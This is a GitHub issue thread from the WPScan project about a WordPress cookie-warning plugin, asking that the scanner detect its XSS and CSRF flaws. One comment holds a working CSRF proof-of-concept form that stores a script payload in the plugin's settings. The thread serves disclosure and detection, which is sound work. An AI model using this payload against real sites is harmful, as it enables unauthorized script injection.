CVE-2012-5856 uk-cookie plugin XSS #184

Closed
fgeek opened this Issue May 14, 2013 · 4 comments

Comments

Projects
None yet
3 participants
Contributor

fgeek commented May 14, 2013

Please add detection for CVE-2012-5856 uk-cookie plugin XSS. More details:

http://osvdb.org/87561
http://seclists.org/bugtraq/2012/Nov/50

Owner

ethicalhack3r commented May 14, 2013

Thanks! I've emailed the Bugtraq poster to see if he can give any further info, from a quick glance there doesn't seem to be anything obvious but there must have been an issue if WordPress have since removed the plugin from their plugins search.

Code can still be found on WP SVN - http://plugins.svn.wordpress.org/uk-cookie/

Added to WPScan, hopefully the reporter can point out where the issue is, if not we can spend some time locating it.

Contributor

fgeek commented Jun 6, 2013

There is CSRF security vulnerability in uk-cookie plugin version 1.1 and using it attacker can insert XSS to front page of WordPress installation. Version 1.1 is the latest (checked 2013-06-06) and I did not test older versions.

<html>
<body>
<form action="https://example.com/wp-admin/options.php" method="POST">
<input type="hidden" name="option&#95;page" value="cookie&#95;plugin&#95;options" />
<input type="hidden" name="action" value="update" />
<input type="hidden" name="&#95;wpnonce" value="e909307b13" />
<input type="hidden" name="&#95;wp&#95;http&#95;referer" value="&#47;wp&#47;wp&#45;admin&#47;options&#45;general&#46;php&#63;page&#61;cookie&#45;alarm&#45;page&amp;settings&#45;updated&#61;true" />
<input type="hidden" name="cookiewarn&#95;options&#91;warn&#95;text&#93;" value="&lt;script&gt;alert&#40;&apos;hacked&apos;&#41;&lt;&#47;script&gt;" />
<input type="hidden" name="cookiewarn&#95;options&#91;redirect&#93;" value="https&#58;&#47;&#47;github&#46;com&#47;wpscanteam&#47;wpscan&#47;" />
<input type="hidden" name="cookiewarn&#95;options&#91;ok&#95;text&#93;" value="Yes" />
<input type="hidden" name="cookiewarn&#95;options&#91;notok&#95;text&#93;" value="No" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
Owner

erwanlr commented Jun 14, 2013

CSRF Added yesterday : 24e039c#L0R4477

erwanlr closed this Jun 14, 2013

Contributor

fgeek commented Jun 14, 2013

Please add CVE-2013-2180 to title, thanks.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment